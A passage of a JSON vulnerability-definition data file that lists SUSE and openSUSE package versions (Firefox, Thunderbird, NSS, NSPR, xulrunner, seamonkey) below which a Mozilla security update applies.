"3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-common-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-translations-other-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "i586", "packageFilename": "MozillaThunderbird-translations-common-3.0.10-0.5.1.i586.rpm", "packageName": "MozillaThunderbird-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "ia64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.ia64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nspr-x86-4.8.6-1.2.1.ia64.rpm", "packageName": "mozilla-nspr-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libfreebl3-3.12.8-1.1.1.x86_64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner192-translations-other-1.9.2.12-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner192-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-buildsymbols-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-buildsymbols", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-js192-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-js192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-branding-upstream-3.6.12-0.1.1.i586.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "libfreebl3-32bit-3.12.8-1.2.1.ppc64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.0.1-6.5.1", "arch": "ppc", "packageFilename": "enigmail-1.0.1-6.5.1.ppc.rpm", "packageName": "enigmail", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.12.8-1.4.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "libfreebl3-3.12.8-1.2.1.s390x.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "ia64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.6.1.ia64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-translations-x86-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-translations-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.2.1.s390x.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "libfreebl3-32bit-3.12.8-1.2.1.x86_64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-other-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-js192-32bit-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-js192-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.15-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "libfreebl3-3.12.8-1.2.1.ia64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "s390x", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.s390x.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.s390x.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "ppc", "packageFilename": "mozilla-nspr-devel-4.8.6-1.1.1.ppc.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-32bit-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-devel-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "ppc", "packageFilename": "mozilla-nspr-64bit-4.8.6-1.1.1.ppc.rpm", "packageName": "mozilla-nspr-64bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "ppc64", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.ppc64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-devel-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.0.1-3.3.1", "arch": "i586", "packageFilename": "enigmail-1.0.1-3.3.1.i586.rpm", "packageName": "enigmail", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-irc-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "ppc", "packageFilename": "mozilla-nspr-64bit-4.8.6-1.6.1.ppc.rpm", "packageName": "mozilla-nspr-64bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "ppc", "packageFilename": "MozillaFirefox-translations-common-3.6.12-0.1.1.ppc.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.ia64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-other-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "python-xpcom191-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.2.1.ppc64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "i586", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.i586.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "s390x", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.s390x.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "ppc", "packageFilename": "mozilla-nspr-4.8.6-1.1.1.ppc.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-venkman-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-common-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "i586", "packageFilename": "seamonkey-venkman-2.0.10-0.1.1.i586.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "s390x", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.s390x.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libsoftokn3-3.12.8-1.1.1.x86_64.rpm", "packageName": "libsoftokn3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.6.1.x86_64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libfreebl3-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "i586", "packageFilename": "mozilla-nss-devel-3.12.8-1.4.1.i586.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "s390x", "packageFilename": "mozilla-nspr-4.8.6-1.6.1.s390x.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-devel-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-branding-upstream-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.6.12-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-x86-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "ppc", "packageFilename": "MozillaThunderbird-translations-other-3.0.10-0.5.1.ppc.rpm", "packageName": "MozillaThunderbird-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.ppc64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-branding-upstream-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-devel-3.0.10-0.5.1.x86_64.rpm", "packageName": "MozillaThunderbird-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-other-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-32bit-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-translations-common-3.0.10-0.5.1.x86_64.rpm", "packageName": "MozillaThunderbird-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libfreebl3-3.12.8-1.1.1.x86_64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "python-xpcom191-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-nss-3.12.8-1.4.1.s390x.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-sysinit-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-sysinit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "i586", "packageFilename": "seamonkey-2.0.10-0.1.1.i586.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "s390x", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.6.1.s390x.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-32bit-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.4.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "libsoftokn3-3.12.8-1.1.1.i586.rpm", "packageName": "libsoftokn3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "x86_64", "packageFilename": 